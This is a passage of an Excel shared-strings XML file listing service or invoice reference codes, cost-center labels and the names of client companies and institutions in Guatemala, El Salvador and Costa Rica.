  </si>
  <si>
    <t>885600006T</t>
  </si>
  <si>
    <t>787700020T</t>
  </si>
  <si>
    <t>F4616755</t>
  </si>
  <si>
    <t>8901352T</t>
  </si>
  <si>
    <t>F4616761</t>
  </si>
  <si>
    <t>F4616784</t>
  </si>
  <si>
    <t>F4616789</t>
  </si>
  <si>
    <t>F4616794</t>
  </si>
  <si>
    <t>F4616799</t>
  </si>
  <si>
    <t>F4616837</t>
  </si>
  <si>
    <t>F4569257</t>
  </si>
  <si>
    <t>F4569258</t>
  </si>
  <si>
    <t>698500001T</t>
  </si>
  <si>
    <t>EMPRESA PORTUARIA QUETZAL</t>
  </si>
  <si>
    <t>F4569275</t>
  </si>
  <si>
    <t>F4569277</t>
  </si>
  <si>
    <t>F4569280</t>
  </si>
  <si>
    <t>F4569281</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4329</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4121</t>
  </si>
  <si>
    <t>F4569378</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0471</t>
  </si>
  <si>
    <t>F4569386</t>
  </si>
  <si>
    <t>F4569406</t>
  </si>
  <si>
    <t>F4552747</t>
  </si>
  <si>
    <t>F4552759</t>
  </si>
  <si>
    <t>F4552765</t>
  </si>
  <si>
    <t>F4552800</t>
  </si>
  <si>
    <t>F4552801</t>
  </si>
  <si>
    <t>47503925T</t>
  </si>
  <si>
    <t>F4552803</t>
  </si>
  <si>
    <t>47503928T</t>
  </si>
  <si>
    <t>F4552821</t>
  </si>
  <si>
    <t>F4552896</t>
  </si>
  <si>
    <t>F4552903</t>
  </si>
  <si>
    <t>F4552913</t>
  </si>
  <si>
    <t>7800790T</t>
  </si>
  <si>
    <t>F4571606</t>
  </si>
  <si>
    <t>F4571607</t>
  </si>
  <si>
    <t>90001801602T</t>
  </si>
  <si>
    <t>25365500SV</t>
  </si>
  <si>
    <t>RILAZ S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4571622</t>
  </si>
  <si>
    <t>F4571634</t>
  </si>
  <si>
    <t>F4571637</t>
  </si>
  <si>
    <t>F4571641</t>
  </si>
  <si>
    <t>90001901979T</t>
  </si>
  <si>
    <t>F4571662</t>
  </si>
  <si>
    <t>F4571665</t>
  </si>
  <si>
    <t>F4571669</t>
  </si>
  <si>
    <t>297400984T</t>
  </si>
  <si>
    <t>IP2124165SV</t>
  </si>
  <si>
    <t>F4571678</t>
  </si>
  <si>
    <t>F4571686</t>
  </si>
  <si>
    <t>F4571689</t>
  </si>
  <si>
    <t>F4571694</t>
  </si>
  <si>
    <t>F4571696</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CASA_MISION_RETALHULEU</t>
  </si>
  <si>
    <t>F4571703</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0459</t>
  </si>
  <si>
    <t>558400003T</t>
  </si>
  <si>
    <t>KOLEKTO, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4571731</t>
  </si>
  <si>
    <t>F4571735</t>
  </si>
  <si>
    <t>F4571738</t>
  </si>
  <si>
    <t>F4596243</t>
  </si>
  <si>
    <t>F4596260</t>
  </si>
  <si>
    <t>F4596273</t>
  </si>
  <si>
    <t>39900007T</t>
  </si>
  <si>
    <t>PROYECTOS TURISTICOS MAYA, S.A.</t>
  </si>
  <si>
    <t>F4596274</t>
  </si>
  <si>
    <t>619500021T</t>
  </si>
  <si>
    <t>F4596284</t>
  </si>
  <si>
    <t>F4596323</t>
  </si>
  <si>
    <t>F4596324</t>
  </si>
  <si>
    <t>F4596343</t>
  </si>
  <si>
    <t>F4596351</t>
  </si>
  <si>
    <t>265900037T</t>
  </si>
  <si>
    <t>F4596361</t>
  </si>
  <si>
    <t>F4596367</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_CLZ_ROOSVELT_Z7</t>
  </si>
  <si>
    <t>F4596383</t>
  </si>
  <si>
    <t>247300037T</t>
  </si>
  <si>
    <t>F4562290</t>
  </si>
  <si>
    <t>F4562292</t>
  </si>
  <si>
    <t>F4562301</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_179</t>
  </si>
  <si>
    <t>ID1124075SV</t>
  </si>
  <si>
    <t>527902ON</t>
  </si>
  <si>
    <t>599215OH</t>
  </si>
  <si>
    <t>F4562340</t>
  </si>
  <si>
    <t>ID1033108SV</t>
  </si>
  <si>
    <t>GRUPO LUBRICANTES SOLORZANO SA DE CV</t>
  </si>
  <si>
    <t>905200003T</t>
  </si>
  <si>
    <t>UBICANDO, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>F4562357</t>
  </si>
  <si>
    <t>F4562363</t>
  </si>
  <si>
    <t>F4562367</t>
  </si>
  <si>
    <t>F4562372</t>
  </si>
  <si>
    <t>F4562375</t>
  </si>
  <si>
    <t>F4562381</t>
  </si>
  <si>
    <t>F4562385</t>
  </si>
  <si>
    <t>758500090T</t>
  </si>
  <si>
    <t>F4562390</t>
  </si>
  <si>
    <t>F4562392</t>
  </si>
  <si>
    <t>910400052T</t>
  </si>
  <si>
    <t>F4562404</t>
  </si>
  <si>
    <t>682358OH</t>
  </si>
  <si>
    <t>F4562412</t>
  </si>
  <si>
    <t>F4562418</t>
  </si>
  <si>
    <t>F4590930</t>
  </si>
  <si>
    <t>F4590931</t>
  </si>
  <si>
    <t>F4590932</t>
  </si>
  <si>
    <t>F4590933</t>
  </si>
  <si>
    <t>F4590934</t>
  </si>
  <si>
    <t>F4590943</t>
  </si>
  <si>
    <t>F4590950</t>
  </si>
  <si>
    <t>F4590951</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3022</t>
  </si>
  <si>
    <t>F4590955</t>
  </si>
  <si>
    <t>F4590978</t>
  </si>
  <si>
    <t>F4590981</t>
  </si>
  <si>
    <t>F4591003</t>
  </si>
  <si>
    <t>F4591005</t>
  </si>
  <si>
    <t>F4591006</t>
  </si>
  <si>
    <t>F4591022</t>
  </si>
  <si>
    <t>F4591024</t>
  </si>
  <si>
    <t>F4591038</t>
  </si>
  <si>
    <t>ID1165028SV</t>
  </si>
  <si>
    <t>F4591048</t>
  </si>
  <si>
    <t>F4591066</t>
  </si>
  <si>
    <t>758500100T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C134</t>
  </si>
  <si>
    <t>F4603578</t>
  </si>
  <si>
    <t>F4603581</t>
  </si>
  <si>
    <t>F4561323</t>
  </si>
  <si>
    <t>943800001T</t>
  </si>
  <si>
    <t>EL CASTOR, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4561332</t>
  </si>
  <si>
    <t>F4561334</t>
  </si>
  <si>
    <t>F4561335</t>
  </si>
  <si>
    <t>833452OC</t>
  </si>
  <si>
    <t>F4561337</t>
  </si>
  <si>
    <t>F4561339</t>
  </si>
  <si>
    <t>758500105T</t>
  </si>
  <si>
    <t>F4561353</t>
  </si>
  <si>
    <t>F4561356</t>
  </si>
  <si>
    <t>F4561374</t>
  </si>
  <si>
    <t>798100002T</t>
  </si>
  <si>
    <t>SONIDO SEGURO S.A.</t>
  </si>
  <si>
    <t>F4561379</t>
  </si>
  <si>
    <t>F4561382</t>
  </si>
  <si>
    <t>F4561407</t>
  </si>
  <si>
    <t>F4561417</t>
  </si>
  <si>
    <t>622700020T</t>
  </si>
  <si>
    <t>FMN047J</t>
  </si>
  <si>
    <t>F4561429</t>
  </si>
  <si>
    <t>317500074T</t>
  </si>
  <si>
    <t>807900280T</t>
  </si>
  <si>
    <t>321000003T</t>
  </si>
  <si>
    <t>F4561445</t>
  </si>
  <si>
    <t>F4561447</t>
  </si>
  <si>
    <t>F4561449</t>
  </si>
  <si>
    <t>F4561450</t>
  </si>
  <si>
    <t>F4561458</t>
  </si>
  <si>
    <t>F4561460</t>
  </si>
  <si>
    <t>F4610251</t>
  </si>
  <si>
    <t>F4610258</t>
  </si>
  <si>
    <t>556500001T</t>
  </si>
  <si>
    <t>SOMIA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4610271</t>
  </si>
  <si>
    <t>F4610273</t>
  </si>
  <si>
    <t>873700001T</t>
  </si>
  <si>
    <t>OFFICIENT S.A.</t>
  </si>
  <si>
    <t>317500064T</t>
  </si>
  <si>
    <t>37200014T</t>
  </si>
  <si>
    <t>22136600SV</t>
  </si>
  <si>
    <t>GM S.A DE C.V.</t>
  </si>
  <si>
    <t>860400002T</t>
  </si>
  <si>
    <t>F4610292</t>
  </si>
  <si>
    <t>F4610293</t>
  </si>
  <si>
    <t>457846ON</t>
  </si>
  <si>
    <t>F4610296</t>
  </si>
  <si>
    <t>F4610301</t>
  </si>
  <si>
    <t>F4610304</t>
  </si>
  <si>
    <t>F4610312</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0201</t>
  </si>
  <si>
    <t>F4610320</t>
  </si>
  <si>
    <t>F4610330</t>
  </si>
  <si>
    <t>5220696ON</t>
  </si>
  <si>
    <t>F4610344</t>
  </si>
  <si>
    <t>883500001T</t>
  </si>
  <si>
    <t>ADMINISTRADORA DE RECURSOS PERSONALES, S.A.</t>
  </si>
  <si>
    <t>536800001T</t>
  </si>
  <si>
    <t>FUNDACION KONRAD ADENAUER</t>
  </si>
  <si>
    <t>F4610354</t>
  </si>
  <si>
    <t>758500329T</t>
  </si>
  <si>
    <t>F4610361</t>
  </si>
  <si>
    <t>F4610362</t>
  </si>
  <si>
    <t>F4610366</t>
  </si>
  <si>
    <t>528469ON</t>
  </si>
  <si>
    <t>ID1276014SV</t>
  </si>
  <si>
    <t>PUMA EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4610389</t>
  </si>
  <si>
    <t>F4610396</t>
  </si>
  <si>
    <t>90001909816T</t>
  </si>
  <si>
    <t>F4617233</t>
  </si>
  <si>
    <t>F4617249</t>
  </si>
  <si>
    <t>F4617318</t>
  </si>
  <si>
    <t>F4617325</t>
  </si>
  <si>
    <t>770600157T</t>
  </si>
  <si>
    <t>F4617354</t>
  </si>
  <si>
    <t>F4617359</t>
  </si>
  <si>
    <t>477700014T</t>
  </si>
  <si>
    <t>F4575563</t>
  </si>
  <si>
    <t>477700015T</t>
  </si>
  <si>
    <t>F4575566</t>
  </si>
  <si>
    <t>F4575571</t>
  </si>
  <si>
    <t>23471800SV</t>
  </si>
  <si>
    <t>619468OH</t>
  </si>
  <si>
    <t>477700002T</t>
  </si>
  <si>
    <t>ID1142045SV</t>
  </si>
  <si>
    <t>F4575600</t>
  </si>
  <si>
    <t>F4575603</t>
  </si>
  <si>
    <t>529800001T</t>
  </si>
  <si>
    <t>ASOCIACION RADIO MARIA</t>
  </si>
  <si>
    <t>F4575614</t>
  </si>
  <si>
    <t>F4575616</t>
  </si>
  <si>
    <t>F4575618</t>
  </si>
  <si>
    <t>301200003T</t>
  </si>
  <si>
    <t>PROFINO S.A.</t>
  </si>
  <si>
    <t>301200001T</t>
  </si>
  <si>
    <t>F4575630</t>
  </si>
  <si>
    <t>F4575631</t>
  </si>
  <si>
    <t>F4575640</t>
  </si>
  <si>
    <t>245700185T</t>
  </si>
  <si>
    <t>F4575643</t>
  </si>
  <si>
    <t>F4575644</t>
  </si>
  <si>
    <t>F4575646</t>
  </si>
  <si>
    <t>F4575647</t>
  </si>
  <si>
    <t>F4575648</t>
  </si>
  <si>
    <t>24868000SV</t>
  </si>
  <si>
    <t>TACOPLAST,S.A.</t>
  </si>
  <si>
    <t>F4575664</t>
  </si>
  <si>
    <t>F4575671</t>
  </si>
  <si>
    <t>F4575672</t>
  </si>
  <si>
    <t>F4575673</t>
  </si>
  <si>
    <t>90001903536T</t>
  </si>
  <si>
    <t>F4575677</t>
  </si>
  <si>
    <t>F4575686</t>
  </si>
  <si>
    <t>F4575690</t>
  </si>
  <si>
    <t>8600218T</t>
  </si>
  <si>
    <t>F4575691</t>
  </si>
  <si>
    <t>F4575694</t>
  </si>
  <si>
    <t>F4575697</t>
  </si>
  <si>
    <t>F4575698</t>
  </si>
  <si>
    <t>F4552998</t>
  </si>
  <si>
    <t>F4553003</t>
  </si>
  <si>
    <t>F4553006</t>
  </si>
  <si>
    <t>F4553007</t>
  </si>
  <si>
    <t>F4553015</t>
  </si>
  <si>
    <t>F4553024</t>
  </si>
  <si>
    <t>3843163ON</t>
  </si>
  <si>
    <t>3450755ON</t>
  </si>
  <si>
    <t>4544105ON</t>
  </si>
  <si>
    <t>F4553030</t>
  </si>
  <si>
    <t>F4553041</t>
  </si>
  <si>
    <t>F4553044</t>
  </si>
  <si>
    <t>F4553045</t>
  </si>
  <si>
    <t>344400177T</t>
  </si>
  <si>
    <t>F4553049</t>
  </si>
  <si>
    <t>367400033T</t>
  </si>
  <si>
    <t>F4553064</t>
  </si>
  <si>
    <t>F4553066</t>
  </si>
  <si>
    <t>IDG000252SV</t>
  </si>
  <si>
    <t>PREFABRICADOS INTERNACIONALES S.A DE C.V</t>
  </si>
  <si>
    <t>F4553077</t>
  </si>
  <si>
    <t>F4553080</t>
  </si>
  <si>
    <t>F4553092</t>
  </si>
  <si>
    <t>F4553093</t>
  </si>
  <si>
    <t>F4553095</t>
  </si>
  <si>
    <t>24871200SV</t>
  </si>
  <si>
    <t>DISTRIBUIDORA DILAC S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4576621</t>
  </si>
  <si>
    <t>F4576625</t>
  </si>
  <si>
    <t>F4576635</t>
  </si>
  <si>
    <t>245700116T</t>
  </si>
  <si>
    <t>F4576644</t>
  </si>
  <si>
    <t>25104100SV</t>
  </si>
  <si>
    <t>F4576649</t>
  </si>
  <si>
    <t>F4576661</t>
  </si>
  <si>
    <t>400000087T</t>
  </si>
  <si>
    <t>F4576666</t>
  </si>
  <si>
    <t>F4576674</t>
  </si>
  <si>
    <t>908689OH</t>
  </si>
  <si>
    <t>5344537ON</t>
  </si>
  <si>
    <t>F4576689</t>
  </si>
  <si>
    <t>F4576699</t>
  </si>
  <si>
    <t>IDG000674SV</t>
  </si>
  <si>
    <t>VALDES, SUAREZ Y VELASCO LIMITADA</t>
  </si>
  <si>
    <t>IP2149100SV</t>
  </si>
  <si>
    <t>F4576708</t>
  </si>
  <si>
    <t>IP2149101SV</t>
  </si>
  <si>
    <t>F4576716</t>
  </si>
  <si>
    <t>296700027T</t>
  </si>
  <si>
    <t>FUNDACION VISION MUNDIAL GUATEMALA</t>
  </si>
  <si>
    <t>F4576734</t>
  </si>
  <si>
    <t>F4576736</t>
  </si>
  <si>
    <t>297401205T</t>
  </si>
  <si>
    <t>652900009T</t>
  </si>
  <si>
    <t>F4576754</t>
  </si>
  <si>
    <t>F4576757</t>
  </si>
  <si>
    <t>F4576758</t>
  </si>
  <si>
    <t>F4576767</t>
  </si>
  <si>
    <t>IDG000227SV</t>
  </si>
  <si>
    <t>CARITAS DE EL SALVADOR</t>
  </si>
  <si>
    <t>F4598101</t>
  </si>
  <si>
    <t>F4598103</t>
  </si>
  <si>
    <t>F4598104</t>
  </si>
  <si>
    <t>F4598105</t>
  </si>
  <si>
    <t>510893ON</t>
  </si>
  <si>
    <t>1738834OH</t>
  </si>
  <si>
    <t>7801000T</t>
  </si>
  <si>
    <t>MP240923012SSV</t>
  </si>
  <si>
    <t>380000003T</t>
  </si>
  <si>
    <t>ARISA CORREDORES DE SEGUROS</t>
  </si>
  <si>
    <t>1516268OH</t>
  </si>
  <si>
    <t>1620978OH</t>
  </si>
  <si>
    <t>OH1001043436</t>
  </si>
  <si>
    <t>F4598145</t>
  </si>
  <si>
    <t>F4598151</t>
  </si>
  <si>
    <t>349400061T</t>
  </si>
  <si>
    <t>F4598160</t>
  </si>
  <si>
    <t>CC_GMG_SV_T092_CIUDAR_MERLIOT</t>
  </si>
  <si>
    <t>F4598164</t>
  </si>
  <si>
    <t>F4598181</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_INT_EDIF_MINI_Z4</t>
  </si>
  <si>
    <t>F4598197</t>
  </si>
  <si>
    <t>F4598198</t>
  </si>
  <si>
    <t>F4598202</t>
  </si>
  <si>
    <t>F4598212</t>
  </si>
  <si>
    <t>570400005T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA E IMPORTADORA DISIM, S.A.</t>
  </si>
  <si>
    <t>IP2024181SV</t>
  </si>
  <si>
    <t>F4598225</t>
  </si>
  <si>
    <t>F4598229</t>
  </si>
  <si>
    <t>F4598235</t>
  </si>
  <si>
    <t>265900014T</t>
  </si>
  <si>
    <t>F4565260</t>
  </si>
  <si>
    <t>F4565268</t>
  </si>
  <si>
    <t>F4565274</t>
  </si>
  <si>
    <t>F4565275</t>
  </si>
  <si>
    <t>IP2129149SV</t>
  </si>
  <si>
    <t>F4565295</t>
  </si>
  <si>
    <t>F4565296</t>
  </si>
  <si>
    <t>424200012T</t>
  </si>
  <si>
    <t>F4565314</t>
  </si>
  <si>
    <t>22135000SV</t>
  </si>
  <si>
    <t>SERVICIOS INTEGRALES CITI SA DE CV</t>
  </si>
  <si>
    <t>F4565318</t>
  </si>
  <si>
    <t>F4565319</t>
  </si>
  <si>
    <t>4642411ON</t>
  </si>
  <si>
    <t>619500034T</t>
  </si>
  <si>
    <t>F4565334</t>
  </si>
  <si>
    <t>F4565335</t>
  </si>
  <si>
    <t>F4565341</t>
  </si>
  <si>
    <t>F4565343</t>
  </si>
  <si>
    <t>F4565347</t>
  </si>
  <si>
    <t>F4565350</t>
  </si>
  <si>
    <t>F4565352</t>
  </si>
  <si>
    <t>F4565353</t>
  </si>
  <si>
    <t>F4565355</t>
  </si>
  <si>
    <t>F4565371</t>
  </si>
  <si>
    <t>38300617T</t>
  </si>
  <si>
    <t>F4565382</t>
  </si>
  <si>
    <t>F4565390</t>
  </si>
  <si>
    <t>F4565392</t>
  </si>
  <si>
    <t>1193605OH</t>
  </si>
  <si>
    <t>331800123T</t>
  </si>
  <si>
    <t>F4592042</t>
  </si>
  <si>
    <t>F4592043</t>
  </si>
  <si>
    <t>F4592045</t>
  </si>
  <si>
    <t>F4592046</t>
  </si>
  <si>
    <t>F4592050</t>
  </si>
  <si>
    <t>F4592052</t>
  </si>
  <si>
    <t>F4592055</t>
  </si>
  <si>
    <t>F4592062</t>
  </si>
  <si>
    <t>593000001T</t>
  </si>
  <si>
    <t>CONTEC INDUSTRIAL, S.A.</t>
  </si>
  <si>
    <t>ID1045116SV</t>
  </si>
  <si>
    <t>AVICOLA SALVADORE?A S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4592084</t>
  </si>
  <si>
    <t>ID1221006SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE ANAMOROS</t>
  </si>
  <si>
    <t>F4592113</t>
  </si>
  <si>
    <t>F4592123</t>
  </si>
  <si>
    <t>F4592142</t>
  </si>
  <si>
    <t>F4592144</t>
  </si>
  <si>
    <t>F4592145</t>
  </si>
  <si>
    <t>ID1182042SV</t>
  </si>
  <si>
    <t>TORTUGA VILLAGE,S.A. DE C.V.</t>
  </si>
  <si>
    <t>47500756T</t>
  </si>
  <si>
    <t>F4592149</t>
  </si>
  <si>
    <t>24456800SV</t>
  </si>
  <si>
    <t>F4592150</t>
  </si>
  <si>
    <t>F4592151</t>
  </si>
  <si>
    <t>F4592152</t>
  </si>
  <si>
    <t>F4592161</t>
  </si>
  <si>
    <t>F4592163</t>
  </si>
  <si>
    <t>25227700SV</t>
  </si>
  <si>
    <t>CREDOMATIC DE EL SALVADOR, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4592167</t>
  </si>
  <si>
    <t>F4603671</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3062</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3139</t>
  </si>
  <si>
    <t>24455300SV</t>
  </si>
  <si>
    <t>CARLOS ANTONIO AGUILAR CHAVARRIA</t>
  </si>
  <si>
    <t>ID1099123SV</t>
  </si>
  <si>
    <t>ID1099137SV</t>
  </si>
  <si>
    <t>F4603762</t>
  </si>
  <si>
    <t>333600075T</t>
  </si>
  <si>
    <t>F4561983</t>
  </si>
  <si>
    <t>F4561989</t>
  </si>
  <si>
    <t>F4562028</t>
  </si>
  <si>
    <t>F4562075</t>
  </si>
  <si>
    <t>F4562089</t>
  </si>
  <si>
    <t>90001902946T</t>
  </si>
  <si>
    <t>F4562103</t>
  </si>
  <si>
    <t>F4562104</t>
  </si>
  <si>
    <t>F4562105</t>
  </si>
  <si>
    <t>F4562112</t>
  </si>
  <si>
    <t>F4610838</t>
  </si>
  <si>
    <t>799000002T</t>
  </si>
  <si>
    <t>STARLINE INTERNACIONAL GM SEGURIDAD</t>
  </si>
  <si>
    <t>F4610845</t>
  </si>
  <si>
    <t>F4610847</t>
  </si>
  <si>
    <t>772700026T</t>
  </si>
  <si>
    <t>F4610853</t>
  </si>
  <si>
    <t>F4610855</t>
  </si>
  <si>
    <t>F4610891</t>
  </si>
  <si>
    <t>F4610892</t>
  </si>
  <si>
    <t>F4610893</t>
  </si>
  <si>
    <t>F4610894</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_SAN_PEDRO_JALAPA</t>
  </si>
  <si>
    <t>729900025T</t>
  </si>
  <si>
    <t>642400003T</t>
  </si>
  <si>
    <t>IP2099242SV</t>
  </si>
  <si>
    <t>CAJA DE CREDITO RURAL ACAJUTLA</t>
  </si>
  <si>
    <t>208200066T</t>
  </si>
  <si>
    <t>ID1099067SV</t>
  </si>
  <si>
    <t>F4610923</t>
  </si>
  <si>
    <t>F4610925</t>
  </si>
  <si>
    <t>568200003T</t>
  </si>
  <si>
    <t>COMERCIALIZADORA CADI S.A.</t>
  </si>
  <si>
    <t>780300002T</t>
  </si>
  <si>
    <t>QUETZAL ASISTENCIA -MAPFRE</t>
  </si>
  <si>
    <t>352200007T</t>
  </si>
  <si>
    <t>352200008T</t>
  </si>
  <si>
    <t>F4610944</t>
  </si>
  <si>
    <t>352200009T</t>
  </si>
  <si>
    <t>F4610957</t>
  </si>
  <si>
    <t>802700024T</t>
  </si>
  <si>
    <t>F4610968</t>
  </si>
  <si>
    <t>727100099T</t>
  </si>
  <si>
    <t>F4617364</t>
  </si>
  <si>
    <t>F4617366</t>
  </si>
  <si>
    <t>F4617371</t>
  </si>
  <si>
    <t>F4617373</t>
  </si>
  <si>
    <t>F4617392</t>
  </si>
  <si>
    <t>F4617394</t>
  </si>
  <si>
    <t>F4617398</t>
  </si>
  <si>
    <t>F4617402</t>
  </si>
  <si>
    <t>F4617415</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0068</t>
  </si>
  <si>
    <t>344400613T</t>
  </si>
  <si>
    <t>F4617440</t>
  </si>
  <si>
    <t>770600060T</t>
  </si>
  <si>
    <t>F4617453</t>
  </si>
  <si>
    <t>F4617455</t>
  </si>
  <si>
    <t>F4617460</t>
  </si>
  <si>
    <t>F4617462</t>
  </si>
  <si>
    <t>F4617474</t>
  </si>
  <si>
    <t>F4617475</t>
  </si>
  <si>
    <t>770600229T</t>
  </si>
  <si>
    <t>F4617482</t>
  </si>
  <si>
    <t>F4617488</t>
  </si>
  <si>
    <t>F4617490</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_MIRAFLORES</t>
  </si>
  <si>
    <t>F4617504</t>
  </si>
  <si>
    <t>47503576T</t>
  </si>
  <si>
    <t>366300006T</t>
  </si>
  <si>
    <t>F4577749</t>
  </si>
  <si>
    <t>F4577765</t>
  </si>
  <si>
    <t>727100106T</t>
  </si>
  <si>
    <t>F4577822</t>
  </si>
  <si>
    <t>292900506T</t>
  </si>
  <si>
    <t>F4577861</t>
  </si>
  <si>
    <t>292900162T</t>
  </si>
  <si>
    <t>F4577864</t>
  </si>
  <si>
    <t>F4577866</t>
  </si>
  <si>
    <t>900601OH</t>
  </si>
  <si>
    <t>F4553250</t>
  </si>
  <si>
    <t>F4553253</t>
  </si>
  <si>
    <t>F4553263</t>
  </si>
  <si>
    <t>F4553272</t>
  </si>
  <si>
    <t>ID1204047SV</t>
  </si>
  <si>
    <t>F4553276</t>
  </si>
  <si>
    <t>F4553287</t>
  </si>
  <si>
    <t>F4553292</t>
  </si>
  <si>
    <t>F4553295</t>
  </si>
  <si>
    <t>F4553298</t>
  </si>
  <si>
    <t>ID1099147SV</t>
  </si>
  <si>
    <t xml:space="preserve"> BILL NELSON VELIS VILLAFUERTE</t>
  </si>
  <si>
    <t>F4553300</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_ILOBASCO</t>
  </si>
  <si>
    <t>F4553304</t>
  </si>
  <si>
    <t>F4553305</t>
  </si>
  <si>
    <t>F4553307</t>
  </si>
  <si>
    <t>F4553312</t>
  </si>
  <si>
    <t>248700013T</t>
  </si>
  <si>
    <t>349900094T</t>
  </si>
  <si>
    <t>F4553326</t>
  </si>
  <si>
    <t>F4553337</t>
  </si>
  <si>
    <t>IP2142029SV</t>
  </si>
  <si>
    <t>F4553349</t>
  </si>
  <si>
    <t>F4553351</t>
  </si>
  <si>
    <t>F4553353</t>
  </si>
  <si>
    <t>F4553354</t>
  </si>
  <si>
    <t>F4553357</t>
  </si>
  <si>
    <t>4467557ON</t>
  </si>
  <si>
    <t>ON0002623042/OLEOCARIBE S.A.OLEOCARIBE S.A.</t>
  </si>
  <si>
    <t>F4553382</t>
  </si>
  <si>
    <t>F4553383</t>
  </si>
  <si>
    <t>801640OH</t>
  </si>
  <si>
    <t>64000050T</t>
  </si>
  <si>
    <t>90001801139T</t>
  </si>
  <si>
    <t>ID1061010SV</t>
  </si>
  <si>
    <t>LA CHAPINA S.A DE C.V</t>
  </si>
  <si>
    <t>F4577222</t>
  </si>
  <si>
    <t>546900004T</t>
  </si>
  <si>
    <t>FARMACEUTICA ANTIGUEÑA SAN MIGUEL S.A.</t>
  </si>
  <si>
    <t>F4577226</t>
  </si>
  <si>
    <t>IP2169005SV</t>
  </si>
  <si>
    <t>F4577232</t>
  </si>
  <si>
    <t>F4577233</t>
  </si>
  <si>
    <t>IP2149079SV</t>
  </si>
  <si>
    <t>F4577238</t>
  </si>
  <si>
    <t>F4577248</t>
  </si>
  <si>
    <t>538600001T</t>
  </si>
  <si>
    <t>IP2184002SV</t>
  </si>
  <si>
    <t>F4577271</t>
  </si>
  <si>
    <t>F4577272</t>
  </si>
  <si>
    <t>F4577279</t>
  </si>
  <si>
    <t>F4577280</t>
  </si>
  <si>
    <t>F4577282</t>
  </si>
  <si>
    <t>F4577283</t>
  </si>
  <si>
    <t>880104OH</t>
  </si>
  <si>
    <t>F4577289</t>
  </si>
  <si>
    <t>90001901603T</t>
  </si>
  <si>
    <t>F4577293</t>
  </si>
  <si>
    <t>8900366T</t>
  </si>
  <si>
    <t>F4577303</t>
  </si>
  <si>
    <t>F4577306</t>
  </si>
  <si>
    <t>F4577324</t>
  </si>
  <si>
    <t>F4577325</t>
  </si>
  <si>
    <t>22186400SV</t>
  </si>
  <si>
    <t>BDO FIGUEROA JIMENEZ &amp; CO. S.A.</t>
  </si>
  <si>
    <t>F4577326</t>
  </si>
  <si>
    <t>F4577327</t>
  </si>
  <si>
    <t>F4577331</t>
  </si>
  <si>
    <t>F4577335</t>
  </si>
  <si>
    <t>F4577343</t>
  </si>
  <si>
    <t>F4577363</t>
  </si>
  <si>
    <t>F4577366</t>
  </si>
  <si>
    <t>F4577368</t>
  </si>
  <si>
    <t>F4577369</t>
  </si>
  <si>
    <t>F4599238</t>
  </si>
  <si>
    <t>344400585T</t>
  </si>
  <si>
    <t>F4599265</t>
  </si>
  <si>
    <t>F4599291</t>
  </si>
  <si>
    <t>F4599306</t>
  </si>
  <si>
    <t>F4599308</t>
  </si>
  <si>
    <t>F4599309</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0761</t>
  </si>
  <si>
    <t>F4599310</t>
  </si>
  <si>
    <t>F4599313</t>
  </si>
  <si>
    <t>F4599340</t>
  </si>
  <si>
    <t>F4599399</t>
  </si>
  <si>
    <t>F4567106</t>
  </si>
  <si>
    <t>F4567138</t>
  </si>
  <si>
    <t>F4567139</t>
  </si>
  <si>
    <t>F4567144</t>
  </si>
  <si>
    <t>302300001T</t>
  </si>
  <si>
    <t>23042800SV</t>
  </si>
  <si>
    <t>BANCO COOPERATIVO VISIONARIO DE R.L.</t>
  </si>
  <si>
    <t>323800025T</t>
  </si>
  <si>
    <t>300800004T</t>
  </si>
  <si>
    <t>300800005T</t>
  </si>
  <si>
    <t>F4567168</t>
  </si>
  <si>
    <t>558400004T</t>
  </si>
  <si>
    <t>F4567179</t>
  </si>
  <si>
    <t>F4567182</t>
  </si>
  <si>
    <t>916000006T</t>
  </si>
  <si>
    <t>ID1356002SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SANTA CLARA</t>
  </si>
  <si>
    <t>3361573ON</t>
  </si>
  <si>
    <t>758500216T</t>
  </si>
  <si>
    <t>340500035T</t>
  </si>
  <si>
    <t>F4567202</t>
  </si>
  <si>
    <t>88600019T</t>
  </si>
  <si>
    <t>88600021T</t>
  </si>
  <si>
    <t>ID1045038SV</t>
  </si>
  <si>
    <t>INDUSTRIAS CARICIA S.A.DE C.V.</t>
  </si>
  <si>
    <t>88600018T</t>
  </si>
  <si>
    <t>F4567226</t>
  </si>
  <si>
    <t>758500450T</t>
  </si>
  <si>
    <t>F4567232</t>
  </si>
  <si>
    <t>758500198T</t>
  </si>
  <si>
    <t>90001906558T</t>
  </si>
  <si>
    <t>F4567238</t>
  </si>
  <si>
    <t>F4567242</t>
  </si>
  <si>
    <t>F4593122</t>
  </si>
  <si>
    <t>F4593124</t>
  </si>
  <si>
    <t>F4593125</t>
  </si>
  <si>
    <t>758500014T</t>
  </si>
  <si>
